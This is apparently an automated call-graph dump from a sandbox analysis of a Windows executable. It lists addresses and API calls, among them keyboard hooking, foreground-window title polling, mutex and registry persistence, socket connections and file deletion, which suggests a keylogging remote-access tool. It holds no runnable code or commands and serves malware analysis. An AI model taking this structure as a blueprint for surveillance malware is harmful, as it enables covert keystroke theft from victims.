calls 47312->48775 47315 40eff9 47313->47315 47316 40eee3 47314->47316 47317 402093 28 API calls 47315->47317 47895 40f474 104 API calls 47316->47895 47319 40f008 47317->47319 47659 41b4ef 47319->47659 47320 40eee8 47320->47278 47322 40eeef 47320->47322 47322->47205 47324 401e65 22 API calls 47325 40f019 47324->47325 47326 401e65 22 API calls 47325->47326 47327 40f02b 47326->47327 47328 401e65 22 API calls 47327->47328 47329 40f04b 47328->47329 47330 43baac _strftime 40 API calls 47329->47330 47331 40f058 47330->47331 47332 401e65 22 API calls 47331->47332 47333 40f063 47332->47333 47334 401e65 22 API calls 47333->47334 47335 40f074 47334->47335 47336 401e65 22 API calls 47335->47336 47337 40f089 47336->47337 47338 401e65 22 API calls 47337->47338 47339 40f09a 47338->47339 47340 40f0a1 StrToIntA 47339->47340 47683 409de4 47340->47683 47343 401e65 22 API calls 47344 40f0bc 47343->47344 47345 40f101 47344->47345 47346 40f0c8 47344->47346 47349 401e65 22 API calls 47345->47349 47900 4344ea 47346->47900 47351 40f111 47349->47351 47350 401e65 22 API calls 47352 40f0e4 47350->47352 47353 40f159 47351->47353 47354 40f11d 47351->47354 47355 40f0eb CreateThread 47352->47355 47357 401e65 22 API calls 47353->47357 47356 4344ea new 22 API calls 47354->47356 47355->47345 48779 419fb4 103 API calls 2 library calls 47355->48779 47358 40f126 47356->47358 47359 40f162 47357->47359 47360 401e65 22 API calls 47358->47360 47362 40f1cc 47359->47362 47363 40f16e 47359->47363 47361 40f138 47360->47361 47364 40f13f CreateThread 47361->47364 47365 401e65 22 API calls 47362->47365 47366 401e65 22 API calls 47363->47366 47364->47353 48778 419fb4 103 API calls 2 library calls 47364->48778 47367 40f1d5 47365->47367 47368 40f17e 47366->47368 47369 40f1e1 47367->47369 47370 40f21a 47367->47370 47371 401e65 22 API calls 47368->47371 47372 401e65 22 API calls 47369->47372 47708 41b60d GetComputerNameExW GetUserNameW 47370->47708 47373 40f193 47371->47373 47375 40f1ea 47372->47375 47907 40d9e8 31 
API calls 47373->47907 47381 401e65 22 API calls 47375->47381 47377 401f13 28 API calls 47378 40f22e 47377->47378 47380 401f09 11 API calls 47378->47380 47383 40f237 47380->47383 47384 40f1ff 47381->47384 47382 40f1a6 47385 401f13 28 API calls 47382->47385 47386 40f240 SetProcessDEPPolicy 47383->47386 47387 40f243 CreateThread 47383->47387 47394 43baac _strftime 40 API calls 47384->47394 47388 40f1b2 47385->47388 47386->47387 47389 40f264 47387->47389 47390 40f258 CreateThread 47387->47390 48748 40f7a7 47387->48748 47391 401f09 11 API calls 47388->47391 47392 40f279 47389->47392 47393 40f26d CreateThread 47389->47393 47390->47389 48780 4120f7 138 API calls 47390->48780 47395 40f1bb CreateThread 47391->47395 47397 40f2cc 47392->47397 47399 402093 28 API calls 47392->47399 47393->47392 48776 4126db 38 API calls ___scrt_fastfail 47393->48776 47396 40f20c 47394->47396 47395->47362 48777 401be9 50 API calls _strftime 47395->48777 47908 40c162 7 API calls 47396->47908 47719 4134ff RegOpenKeyExA 47397->47719 47400 40f29c 47399->47400 47909 4052fd 28 API calls 47400->47909 47406 40f2ed 47408 41bc5e 28 API calls 47406->47408 47410 40f2fd 47408->47410 47910 41361b 31 API calls 47410->47910 47414 40f313 47415 401f09 11 API calls 47414->47415 47418 40f31e 47415->47418 47416 40f346 DeleteFileW 47417 40f34d 47416->47417 47416->47418 47417->47224 47418->47224 47418->47416 47419 40f334 Sleep 47418->47419 47419->47418 47420->47098 47421->47102 47422->47107 47423->47105 47424->47115 47425->47116 47426->47118 47427->47121 47428->47125 47429->47127 47434 44fb68 47430->47434 47433 438f5a 8 API calls 3 library calls 47433->47132 47437 44fb85 47434->47437 47438 44fb81 47434->47438 47436 4345bd 47436->47130 47436->47433 47437->47438 47440 449ca6 47437->47440 47452 434fcb 47438->47452 47441 449cb2 ___BuildCatchObject 47440->47441 47459 445888 EnterCriticalSection 47441->47459 47443 449cb9 47460 450183 47443->47460 47445 449cc8 47446 449cd7 47445->47446 47471 449b3a 23 API calls 
47445->47471 47473 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47446->47473 47449 449cd2 47472 449bf0 GetStdHandle GetFileType 47449->47472 47450 449ce8 ___BuildCatchObject 47450->47437 47453 434fd6 IsProcessorFeaturePresent 47452->47453 47454 434fd4 47452->47454 47456 435018 47453->47456 47454->47436 47495 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47456->47495 47458 4350fb 47458->47436 47459->47443 47461 45018f ___BuildCatchObject 47460->47461 47462 4501b3 47461->47462 47463 45019c 47461->47463 47474 445888 EnterCriticalSection 47462->47474 47482 4405dd 20 API calls __dosmaperr 47463->47482 47466 4501eb 47483 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47466->47483 47467 4501bf 47467->47466 47475 4500d4 47467->47475 47469 4501a1 ___BuildCatchObject _strftime 47469->47445 47471->47449 47472->47446 47473->47450 47474->47467 47484 445af3 47475->47484 47477 4500f3 47492 446782 20 API calls __dosmaperr 47477->47492 47480 450145 47480->47467 47481 4500e6 47481->47477 47491 448a84 11 API calls 2 library calls 47481->47491 47482->47469 47483->47469 47489 445b00 __Getctype 47484->47489 47485 445b40 47494 4405dd 20 API calls __dosmaperr 47485->47494 47486 445b2b RtlAllocateHeap 47487 445b3e 47486->47487 47486->47489 47487->47481 47489->47485 47489->47486 47493 442f80 7 API calls 2 library calls 47489->47493 47491->47481 47492->47480 47493->47489 47494->47487 47495->47458 47497 434b27 GetStartupInfoW 47496->47497 47497->47136 47499 44f06b 47498->47499 47500 44f062 47498->47500 47499->47140 47503 44ef58 49 API calls 5 library calls 47500->47503 47502->47140 47503->47499 47505 41cb8f LoadLibraryA GetProcAddress 47504->47505 47506 41cb7f GetModuleHandleA GetProcAddress 47504->47506 47507 41cbb8 44 API calls 47505->47507 47508 41cba8 LoadLibraryA GetProcAddress 47505->47508 47506->47505 47507->47144 47508->47507 47913 41b4a8 FindResourceA 47509->47913 47513 40f3ed ctype 47923 4020b7 47513->47923 47516 401fe2 28 
API calls 47517 40f413 47516->47517 47518 401fd8 11 API calls 47517->47518 47519 40f41c 47518->47519 47520 43bd51 ___std_exception_copy 21 API calls 47519->47520 47521 40f42d ctype 47520->47521 47929 406dd8 47521->47929 47523 40f460 47523->47146 47525 40210c 47524->47525 47526 4023ce 11 API calls 47525->47526 47527 402126 47526->47527 47528 402569 28 API calls 47527->47528 47529 402134 47528->47529 47529->47149 47966 4020df 47530->47966 47532 41be9e 47533 401fd8 11 API calls 47532->47533 47534 41bed0 47533->47534 47536 401fd8 11 API calls 47534->47536 47535 41bea0 47982 4041a2 28 API calls 47535->47982 47539 41bed8 47536->47539 47541 401fd8 11 API calls 47539->47541 47540 41beac 47542 401fe2 28 API calls 47540->47542 47544 40ea24 47541->47544 47545 41beb5 47542->47545 47543 401fe2 28 API calls 47551 41be2e 47543->47551 47552 40fb17 47544->47552 47546 401fd8 11 API calls 47545->47546 47548 41bebd 47546->47548 47547 401fd8 11 API calls 47547->47551 47549 41ce34 28 API calls 47548->47549 47549->47532 47551->47532 47551->47535 47551->47543 47551->47547 47970 4041a2 28 API calls 47551->47970 47971 41ce34 47551->47971 47553 40fb23 47552->47553 47555 40fb2a 47552->47555 48008 402163 11 API calls 47553->48008 47555->47154 47557 402163 47556->47557 47558 40219f 47557->47558 48009 402730 11 API calls 47557->48009 47558->47156 47560 402184 48010 402712 11 API calls std::_Deallocate 47560->48010 47563 401e6d 47562->47563 47564 401e75 47563->47564 48011 402158 22 API calls 47563->48011 47564->47161 47568 4020df 11 API calls 47567->47568 47569 40532a 47568->47569 48012 4032a0 47569->48012 47571 405346 47571->47169 48017 4051ef 47572->48017 47574 406391 48021 402055 47574->48021 47577 401fe2 47578 401ff1 47577->47578 47585 402039 47577->47585 47579 4023ce 11 API calls 47578->47579 47580 401ffa 47579->47580 47581 402015 47580->47581 47582 40203c 47580->47582 48055 403098 28 API calls 47581->48055 47583 40267a 11 API calls 47582->47583 47583->47585 47586 401fd8 47585->47586 47587 
4023ce 11 API calls 47586->47587 47588 401fe1 47587->47588 47588->47181 47590 401fd2 47589->47590 47591 401fc9 47589->47591 47590->47187 48056 4025e0 28 API calls 47591->48056 48057 401fab 47593->48057 47595 40d073 CreateMutexA GetLastError 47595->47203 48058 41bfb7 47596->48058 47601 401fe2 28 API calls 47602 41b2ff 47601->47602 47603 401fd8 11 API calls 47602->47603 47604 41b307 47603->47604 47605 4135a6 31 API calls 47604->47605 47607 41b35d 47604->47607 47606 41b330 47605->47606 47608 41b33b StrToIntA 47606->47608 47607->47209 47609 41b349 47608->47609 47612 41b352 47608->47612 48066 41cf69 22 API calls 47609->48066 47611 401fd8 11 API calls 47611->47607 47612->47611 47614 40772a 47613->47614 47615 413549 3 API calls 47614->47615 47616 407731 47615->47616 47616->47221 47616->47222 47618 41bc72 47617->47618 48067 40b904 47618->48067 47620 41bc7a 47620->47237 47622 401f22 47621->47622 47629 401f6a 47621->47629 47623 402252 11 API calls 47622->47623 47624 401f2b 47623->47624 47625 401f6d 47624->47625 47626 401f46 47624->47626 48100 402336 47625->48100 48099 40305c 28 API calls 47626->48099 47630 401f09 47629->47630 47631 402252 11 API calls 47630->47631 47632 401f12 47631->47632 47632->47249 47634 413965 47633->47634 47635 406dd8 28 API calls 47634->47635 47636 41397a 47635->47636 47637 4020f6 28 API calls 47636->47637 47638 41398a 47637->47638 47639 41376f 14 API calls 47638->47639 47640 413994 47639->47640 47641 401fd8 11 API calls 47640->47641 47642 4139a1 47641->47642 47642->47297 47644 40209b 47643->47644 47645 4023ce 11 API calls 47644->47645 47646 4020a6 47645->47646 48104 4024ed 47646->48104 47650 413788 47649->47650 47651 4137bf 47649->47651 47654 41379a RegSetValueExA RegCloseKey 47650->47654 47652 401fd8 11 API calls 47651->47652 47653 40ef9e 47652->47653 47653->47300 47654->47651 47656 43bac5 _strftime 47655->47656 48108 43ae03 47656->48108 47658 40efb7 47658->47306 47658->47308 47660 41b5a0 47659->47660 47661 41b505 GetLocalTime 47659->47661 47662 
401fd8 11 API calls 47660->47662 47663 40531e 28 API calls 47661->47663 47665 41b5a8 47662->47665 47664 41b547 47663->47664 47666 406383 28 API calls 47664->47666 47667 401fd8 11 API calls 47665->47667 47668 41b553 47666->47668 47669 40f00d 47667->47669 48136 402f10 47668->48136 47669->47324 47672 406383 28 API calls 47673 41b56b 47672->47673 48141 407200 77 API calls 47673->48141 47675 41b579 47676 401fd8 11 API calls 47675->47676 47677 41b585 47676->47677 47678 401fd8 11 API calls 47677->47678 47679 41b58e 47678->47679 47680 401fd8 11 API calls 47679->47680 47681 41b597 47680->47681 47682 401fd8 11 API calls 47681->47682 47682->47660 47684 409e02 _wcslen 47683->47684 47685 409e24 47684->47685 47686 409e0d 47684->47686 47688 40da34 31 API calls 47685->47688 47687 40da34 31 API calls 47686->47687 47689 409e15 47687->47689 47690 409e2c 47688->47690 47692 401f13 28 API calls 47689->47692 47691 401f13 28 API calls 47690->47691 47693 409e3a 47691->47693 47694 409e1f 47692->47694 47695 401f09 11 API calls 47693->47695 47697 401f09 11 API calls 47694->47697 47696 409e42 47695->47696 48160 40915b 28 API calls 47696->48160 47699 409e79 47697->47699 48145 40a109 47699->48145 47700 409e54 48161 403014 47700->48161 47705 401f13 28 API calls 47706 409e69 47705->47706 47707 401f09 11 API calls 47706->47707 47707->47694 48366 40417e 47708->48366 47713 403014 28 API calls 47714 41b672 47713->47714 47715 401f09 11 API calls 47714->47715 47716 41b67b 47715->47716 47717 401f09 11 API calls 47716->47717 47718 40f223 47717->47718 47718->47377 47720 413520 RegQueryValueExA RegCloseKey 47719->47720 47721 40f2e4 47719->47721 47720->47721 47721->47250 47721->47406 47723 413a3f RegDeleteValueW 47722->47723 47724 40f392 47722->47724 47723->47724 47724->47244 47726 40dd5b 47725->47726 47727 4134ff 3 API calls 47726->47727 47729 40dd62 47727->47729 47728 40dd81 47733 414f2a 47728->47733 47729->47728 48458 401707 47729->48458 47731 40dd6f 48461 413877 RegCreateKeyA 47731->48461 47734 4020df 11 
API calls 47733->47734 47735 414f3e 47734->47735 48475 41b8b3 47735->48475 47738 4020df 11 API calls 47739 414f54 47738->47739 47740 401e65 22 API calls 47739->47740 47741 414f62 47740->47741 47742 43baac _strftime 40 API calls 47741->47742 47743 414f6f 47742->47743 47744 414f81 47743->47744 47745 414f74 Sleep 47743->47745 47746 402093 28 API calls 47744->47746 47745->47744 47747 414f90 47746->47747 47748 401e65 22 API calls 47747->47748 47749 414f99 47748->47749 47750 4020f6 28 API calls 47749->47750 47751 414fa4 47750->47751 47752 41be1b 28 API calls 47751->47752 47753 414fac 47752->47753 48479 40489e WSAStartup 47753->48479 47755 414fb6 47756 401e65 22 API calls 47755->47756 47757 414fbf 47756->47757 47758 401e65 22 API calls 47757->47758 47782 41503e 47757->47782 47759 414fd8 47758->47759 47760 401e65 22 API calls 47759->47760 47762 414fe9 47760->47762 47761 4020f6 28 API calls 47761->47782 47764 401e65 22 API calls 47762->47764 47763 41be1b 28 API calls 47763->47782 47765 414ffa 47764->47765 47767 401e65 22 API calls 47765->47767 47766 406c1e 28 API calls 47766->47782 47768 41500b 47767->47768 47770 401e65 22 API calls 47768->47770 47769 401fe2 28 API calls 47769->47782 47771 41501c 47770->47771 47772 401e65 22 API calls 47771->47772 47773 41502e 47772->47773 48655 40473d 89 API calls 47773->48655 47775 401e65 22 API calls 47775->47782 47777 41518c WSAGetLastError 48485 41cae1 47777->48485 47782->47761 47782->47763 47782->47766 47782->47769 47782->47775 47782->47777 47785 40531e 28 API calls 47782->47785 47786 401e8d 11 API calls 47782->47786 47787 43baac _strftime 40 API calls 47782->47787 47789 402f10 28 API calls 47782->47789 47790 402093 28 API calls 47782->47790 47791 41b4ef 80 API calls 47782->47791 47794 40905c 28 API calls 47782->47794 47795 441e81 20 API calls 47782->47795 47796 4136f8 3 API calls 47782->47796 47797 4135a6 31 API calls 47782->47797 47798 40417e 28 API calls 47782->47798 47801 41bd1e 28 API calls 47782->47801 47802 41bb8e 28 API calls 
47782->47802 47803 401e65 22 API calls 47782->47803 47810 406383 28 API calls 47782->47810 47811 402ea1 28 API calls 47782->47811 47813 401fd8 11 API calls 47782->47813 47815 415a33 47782->47815 47817 415a71 CreateThread 47782->47817 47818 401f09 11 API calls 47782->47818 48480 414ee9 47782->48480 48496 40482d 47782->48496 48503 404f51 47782->48503 48518 4048c8 connect 47782->48518 48578 41b7e0 47782->48578 48581 4145bd 47782->48581 48584 40dd89 47782->48584 48590 41bc42 47782->48590 48593 41bae6 47782->48593 48595 41ba96 47782->48595 48600 40f8d1 GetLocaleInfoA 47782->48600 48603 402f31 47782->48603 48608 404aa1 47782->48608 48623 404c10 47782->48623 48642 404e26 WaitForSingleObject 47782->48642 48656 4052fd 28 API calls 47782->48656 47785->47782 47786->47782 47788 415acf Sleep 47787->47788 47788->47782 47789->47782 47790->47782 47791->47782 47794->47782 47795->47782 47796->47782 47797->47782 47798->47782 47801->47782 47802->47782 47804 415439 GetTickCount 47803->47804 47805 41bb8e 28 API calls 47804->47805 47805->47782 47810->47782 47811->47782 47813->47782 48657 40b051 85 API calls 47815->48657 47817->47782 48738 41ad17 104 API calls 47817->48738 47818->47782 47819->47162 47820->47170 47821->47174 47824 4020df 11 API calls 47823->47824 47825 406c2a 47824->47825 47826 4032a0 28 API calls 47825->47826 47827 406c47 47826->47827 47827->47195 47829 40eba4 47828->47829 47830 413573 RegQueryValueExA RegCloseKey 47828->47830 47829->47192 47829->47210 47830->47829 47831->47198 47832->47229 47833->47222 47834->47212 47835->47227 47837 401f86 11 API calls 47836->47837 47838 40da50 47837->47838 47839 40da70 47838->47839 47840 40daa5 47838->47840 47841 40da66 47838->47841 48739 41b5b4 29 API calls 47839->48739 47842 41bfb7 GetCurrentProcess 47840->47842 47844 40db99 GetLongPathNameW 47841->47844 47846 40daaa 47842->47846 47845 40417e 28 API calls 47844->47845 47848 40dbae 47845->47848 47849 40db00 47846->47849 47850 40daae 47846->47850 47847 40da79 47851 401f13 28 API calls 
47847->47851 47852 40417e 28 API calls 47848->47852 47853 40417e 28 API calls 47849->47853 47854 40417e 28 API calls 47850->47854 47855 40da83 47851->47855 47856 40dbbd 47852->47856 47857 40db0e 47853->47857 47858 40dabc 47854->47858 47860 401f09 11 API calls 47855->47860 48742 40ddd1 28 API calls 47856->48742 47863 40417e 28 API calls 47857->47863 47864 40417e 28 API calls 47858->47864 47860->47841 47861 40dbd0 48743 402fa5 28 API calls 47861->48743 47866 40db24 47863->47866 47867 40dad2 47864->47867 47865 40dbdb 48744 402fa5 28 API calls 47865->48744 48741 402fa5 28 API calls 47866->48741 48740 402fa5 28 API calls 47867->48740 47871 40dbe5 47874 401f09 11 API calls 47871->47874 47872 40db2f 47875 401f13 28 API calls 47872->47875 47873 40dadd 47876 401f13 28 API calls 47873->47876 47877 40dbef 47874->47877 47878 40db3a 47875->47878 47879 40dae8 47876->47879 47880 401f09 11 API calls 47877->47880 47881 401f09 11 API calls 47878->47881 47882 401f09 11 API calls 47879->47882 47884 40dbf8 47880->47884 47885 40db43 47881->47885 47883 40daf1 47882->47883 47887 401f09 11 API calls 47883->47887 47888 401f09 11 API calls 47884->47888 47886 401f09 11 API calls 47885->47886 47886->47855 47887->47855 47889 40dc01 47888->47889 47890 401f09 11 API calls 47889->47890 47891 40dc0a 47890->47891 47892 401f09 11 API calls 47891->47892 47893 40dc13 47892->47893 47893->47285 47894->47298 47895->47320 47897 41371e RegQueryValueExA RegCloseKey 47896->47897 47898 413742 47896->47898 47897->47898 47898->47278 47899->47312 47903 4344ef 47900->47903 47901 43bd51 ___std_exception_copy 21 API calls 47901->47903 47902 40f0d1 47902->47350 47903->47901 47903->47902 48745 442f80 7 API calls 2 library calls 47903->48745 48746 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47903->48746 48747 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47903->48747 47907->47382 47908->47370 47910->47414 47911->47217 47914 41b4c5 LoadResource LockResource 
SizeofResource 47913->47914 47915 40f3de 47913->47915 47914->47915 47916 43bd51 47915->47916 47921 446137 __Getctype 47916->47921 47917 446175 47933 4405dd 20 API calls __dosmaperr 47917->47933 47918 446160 RtlAllocateHeap 47920 446173 47918->47920 47918->47921 47920->47513 47921->47917 47921->47918 47932 442f80 7 API calls 2 library calls 47921->47932 47924 4020bf 47923->47924 47934 4023ce 47924->47934 47926 4020ca 47938 40250a 47926->47938 47928 4020d9 47928->47516 47930 4020b7 28 API calls 47929->47930 47931 406dec 47930->47931 47931->47523 47932->47921 47933->47920 47935 402428 47934->47935 47936 4023d8 47934->47936 47935->47926 47936->47935 47945 4027a7 11 API calls std::_Deallocate 47936->47945 47939 40251a 47938->47939 47940 402520 47939->47940 47941 402535 47939->47941 47946 402569 47940->47946 47956 4028e8 28 API calls 47941->47956 47944 402533 47944->47928 47945->47935 47957 402888 47946->47957 47948 40257d 47949 402592 47948->47949 47950 4025a7 47948->47950 47962 402a34 22 API calls 47949->47962 47964 4028e8 28 API calls 47950->47964 47953 40259b 47963 4029da 22 API calls 47953->47963 47955 4025a5 47955->47944 47956->47944 47958 402890 47957->47958 47959 402898 47958->47959 47965 402ca3 22 API calls 47958->47965 47959->47948 47962->47953 47963->47955 47964->47955 47967 4020e7 47966->47967 47968 4023ce 11 API calls 47967->47968 47969 4020f2 47968->47969 47969->47551 47970->47551 47972 41ce41 47971->47972 47973 41cea0 47972->47973 47977 41ce51 47972->47977 47974 41ceba 47973->47974 47975 41cfe0 28 API calls 47973->47975 47992 41d146 28 API calls 47974->47992 47975->47974 47978 41ce89 47977->47978 47983 41cfe0 47977->47983 47991 41d146 28 API calls 47978->47991 47979 41ce9c 47979->47551 47982->47540 47985 41cfe8 47983->47985 47984 41d01a 47984->47978 47985->47984 47986 41d01e 47985->47986 47989 41d002 47985->47989 48003 402725 22 API calls 47986->48003 47993 41d051 47989->47993 47991->47979 47992->47979 47994 41d05b __EH_prolog 47993->47994 48004 402717 22 
API calls 47994->48004 47996 41d06e 48005 41d15d 11 API calls 47996->48005 47998 41d094 47999 41d0cc 47998->47999 48006 402730 11 API calls 47998->48006 47999->47984 48001 41d0b3 48007 402712 11 API calls std::_Deallocate 48001->48007 48004->47996 48005->47998 48006->48001 48007->47999 48008->47555 48009->47560 48010->47558 48014 4032aa 48012->48014 48013 4032c9 48013->47571 48014->48013 48016 4028e8 28 API calls 48014->48016 48016->48013 48018 4051fb 48017->48018 48027 405274 48018->48027 48020 405208 48020->47574 48022 402061 48021->48022 48023 4023ce 11 API calls 48022->48023 48024 40207b 48023->48024 48051 40267a 48024->48051 48028 405282 48027->48028 48029 405288 48028->48029 48030 40529e 48028->48030 48038 4025f0 48029->48038 48032 4052f5 48030->48032 48033 4052b6 48030->48033 48048 4028a4 22 API calls 48032->48048 48037 40529c 48033->48037 48047 4028e8 28 API calls 48033->48047 48037->48020 48039 402888 22 API calls 48038->48039 48040 402602 48039->48040 48041 402672 48040->48041 48042 402629 48040->48042 48050 4028a4 22 API calls 48041->48050 48046 40263b 48042->48046 48049 4028e8 28 API calls 48042->48049 48046->48037 48047->48037 48049->48046 48052 40268b 48051->48052 48053 4023ce 11 API calls 48052->48053 48054 40208d 48053->48054 48054->47577 48055->47585 48056->47590 48059 41bfc4 GetCurrentProcess 48058->48059 48060 41b2d1 48058->48060 48059->48060 48061 4135a6 RegOpenKeyExA 48060->48061 48062 4135d4 RegQueryValueExA RegCloseKey 48061->48062 48063 4135fe 48061->48063 48062->48063 48064 402093 28 API calls 48063->48064 48065 413613 48064->48065 48065->47601 48066->47612 48068 40b90c 48067->48068 48073 402252 48068->48073 48070 40b917 48077 40b92c 48070->48077 48072 40b926 48072->47620 48074 40225c 48073->48074 48075 4022ac 48073->48075 48074->48075 48084 402779 11 API calls std::_Deallocate 48074->48084 48075->48070 48078 40b966 48077->48078 48079 40b938 48077->48079 48096 4028a4 22 API calls 48078->48096 48085 4027e6 48079->48085 48083 40b942 
48083->48072 48084->48075 48086 4027ef 48085->48086 48087 402851 48086->48087 48088 4027f9 48086->48088 48098 4028a4 22 API calls 48087->48098 48091 402802 48088->48091 48092 402815 48088->48092 48097 402aea 28 API calls __EH_prolog 48091->48097 48094 402813 48092->48094 48095 402252 11 API calls 48092->48095 48094->48083 48095->48094 48097->48094 48099->47629 48101 402347 48100->48101 48102 402252 11 API calls 48101->48102 48103 4023c7 48102->48103 48103->47629 48105 4024f9 48104->48105 48106 40250a 28 API calls 48105->48106 48107 4020b1 48106->48107 48107->47290 48124 43ba0a 48108->48124 48110 43ae50 48130 43a7b7 36 API calls 2 library calls 48110->48130 48112 43ae15 48112->48110 48113 43ae2a 48112->48113 48123 43ae2f _strftime 48112->48123 48129 4405dd 20 API calls __dosmaperr 48113->48129 48116 43ae5c 48117 43ae8b 48116->48117 48131 43ba4f 40 API calls __Tolower 48116->48131 48120 43aef7 48117->48120 48132 43b9b6 20 API calls 2 library calls 48117->48132 48133 43b9b6 20 API calls 2 library calls 48120->48133 48121 43afbe _strftime 48121->48123 48134 4405dd 20 API calls __dosmaperr 48121->48134 48123->47658 48125 43ba22 48124->48125 48126 43ba0f 48124->48126 48125->48112 48135 4405dd 20 API calls __dosmaperr 48126->48135 48128 43ba14 _strftime 48128->48112 48129->48123 48130->48116 48131->48116 48132->48120 48133->48121 48134->48123 48135->48128 48142 401fb0 48136->48142 48138 402f1e 48139 402055 11 API calls 48138->48139 48140 402f2d 48139->48140 48140->47672 48141->47675 48143 4025f0 28 API calls 48142->48143 48144 401fbd 48143->48144 48144->48138 48146 40a127 48145->48146 48147 413549 3 API calls 48146->48147 48148 40a12e 48147->48148 48149 40a142 48148->48149 48150 40a15c 48148->48150 48151 409e9b 48149->48151 48152 40a147 48149->48152 48166 40905c 48150->48166 48151->47343 48154 40905c 28 API calls 48152->48154 48156 40a155 48154->48156 48194 40a22d 29 API calls 48156->48194 48159 40a15a 48159->48151 48160->47700 48343 403222 48161->48343 48163 403022 48347 
403262 48163->48347 48167 409072 48166->48167 48168 402252 11 API calls 48167->48168 48169 40908c 48168->48169 48195 404267 48169->48195 48171 40909a 48172 40a179 48171->48172 48207 40b8ec 48172->48207 48175 40a1a2 48178 402093 28 API calls 48175->48178 48176 40a1ca 48177 402093 28 API calls 48176->48177 48180 40a1d5 48177->48180 48179 40a1ac 48178->48179 48181 41bc5e 28 API calls 48179->48181 48182 402093 28 API calls 48180->48182 48183 40a1ba 48181->48183 48184 40a1e4 48182->48184 48211 40b164 31 API calls ___std_exception_copy 48183->48211 48186 41b4ef 80 API calls 48184->48186 48188 40a1e9 CreateThread 48186->48188 48187 40a1c1 48189 401fd8 11 API calls 48187->48189 48190 40a210 CreateThread 48188->48190 48191 40a204 CreateThread 48188->48191 48219 40a27d 48188->48219 48189->48176 48192 401f09 11 API calls 48190->48192 48216 40a289 48190->48216 48191->48190 48213 40a267 48191->48213 48193 40a224 48192->48193 48193->48151 48194->48159 48342 40a273 162 API calls 48194->48342 48196 402888 22 API calls 48195->48196 48197 40427b 48196->48197 48198 404290 48197->48198 48199 4042a5 48197->48199 48205 4042df 22 API calls 48198->48205 48200 4027e6 28 API calls 48199->48200 48202 4042a3 48200->48202 48202->48171 48203 404299 48206 402c48 22 API calls 48203->48206 48205->48203 48206->48202 48208 40b8f5 48207->48208 48209 40a197 48207->48209 48212 40b96c 28 API calls 48208->48212 48209->48175 48209->48176 48211->48187 48212->48209 48222 40a2b8 48213->48222 48253 40acd6 48216->48253 48295 40a726 48219->48295 48223 40a2d1 SetWindowsHookExA 48222->48223 48224 40a333 GetMessageA 48222->48224 48223->48224 48227 40a2ed GetLastError 48223->48227 48225 40a345 TranslateMessage DispatchMessageA 48224->48225 48237 40a270 48224->48237 48225->48224 48225->48237 48238 41bb8e 48227->48238 48244 441e81 48238->48244 48241 402093 28 API calls 48242 40a2fe 48241->48242 48243 4052fd 28 API calls 48242->48243 48245 441e8d 48244->48245 48248 441c7d 48245->48248 48247 41bbb2 48247->48241 48249 
441c94 48248->48249 48251 441ccb _strftime 48249->48251 48252 4405dd 20 API calls __dosmaperr 48249->48252 48251->48247 48252->48251 48260 40ace4 48253->48260 48254 40a292 48255 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48257 40b904 28 API calls 48255->48257 48257->48260 48260->48254 48260->48255 48262 41bae6 GetTickCount 48260->48262 48263 40ad84 GetWindowTextW 48260->48263 48265 401f09 11 API calls 48260->48265 48266 40aedc 48260->48266 48267 40b8ec 28 API calls 48260->48267 48269 40ae49 Sleep 48260->48269 48270 441e81 20 API calls 48260->48270 48272 402093 28 API calls 48260->48272 48273 40add1 48260->48273 48277 403014 28 API calls 48260->48277 48278 406383 28 API calls 48260->48278 48280 40a636 12 API calls 48260->48280 48281 41bc5e 28 API calls 48260->48281 48282 401fd8 11 API calls 48260->48282 48283 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48260->48283 48284 401f86 48260->48284 48288 434770 23 API calls __onexit 48260->48288 48289 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48260->48289 48290 409044 28 API calls 48260->48290 48292 40b97c 28 API calls 48260->48292 48293 40b748 40 API calls 2 library calls 48260->48293 48294 4052fd 28 API calls 48260->48294 48262->48260 48263->48260 48265->48260 48268 401f09 11 API calls 48266->48268 48267->48260 48268->48254 48269->48260 48270->48260 48272->48260 48273->48260 48276 40905c 28 API calls 48273->48276 48291 40b164 31 API calls ___std_exception_copy 48273->48291 48276->48273 48277->48260 48278->48260 48280->48260 48281->48260 48282->48260 48285 401f8e 48284->48285 48286 402252 11 API calls 48285->48286 48287 401f99 48286->48287 48287->48260 48288->48260 48289->48260 48290->48260 48291->48273 48292->48260 48293->48260 48296 40a73b Sleep 48295->48296 48316 40a675 48296->48316 48298 40a286 48299 40a77b CreateDirectoryW 48303 40a74d 48299->48303 48300 40a78c GetFileAttributesW 48300->48303 
48301 40a7a3 SetFileAttributesW 48301->48303 48303->48296 48303->48298 48303->48299 48303->48300 48303->48301 48305 401e65 22 API calls 48303->48305 48314 40a7ee 48303->48314 48329 41c3f1 48303->48329 48304 40a81d PathFileExistsW 48304->48314 48305->48303 48306 4020df 11 API calls 48306->48314 48307 4020b7 28 API calls 48307->48314 48309 40a926 SetFileAttributesW 48309->48303 48310 406dd8 28 API calls 48310->48314 48311 401fe2 28 API calls 48311->48314 48312 401fd8 11 API calls 48312->48314 48314->48304 48314->48306 48314->48307 48314->48309 48314->48310 48314->48311 48314->48312 48315 401fd8 11 API calls 48314->48315 48339 41c485 32 API calls 48314->48339 48340 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48314->48340 48315->48303 48317 40a722 48316->48317 48320 40a68b 48316->48320 48317->48303 48318 40a6aa CreateFileW 48319 40a6b8 GetFileSize 48318->48319 48318->48320 48319->48320 48321 40a6ed CloseHandle 48319->48321 48320->48318 48320->48321 48322 40a6ff 48320->48322 48323 40a6e2 Sleep 48320->48323 48324 40a6db 48320->48324 48321->48320 48322->48317 48326 40905c 28 API calls 48322->48326 48323->48321 48341 40b0dc 84 API calls 48324->48341 48327 40a71b 48326->48327 48328 40a179 123 API calls 48327->48328 48328->48317 48330 41c404 CreateFileW 48329->48330 48332 41c441 48330->48332 48333 41c43d 48330->48333 48334 41c461 WriteFile 48332->48334 48335 41c448 SetFilePointer 48332->48335 48333->48303 48337 41c474 48334->48337 48338 41c476 CloseHandle 48334->48338 48335->48334 48336 41c458 CloseHandle 48335->48336 48336->48333 48337->48338 48338->48333 48339->48314 48340->48314 48341->48323 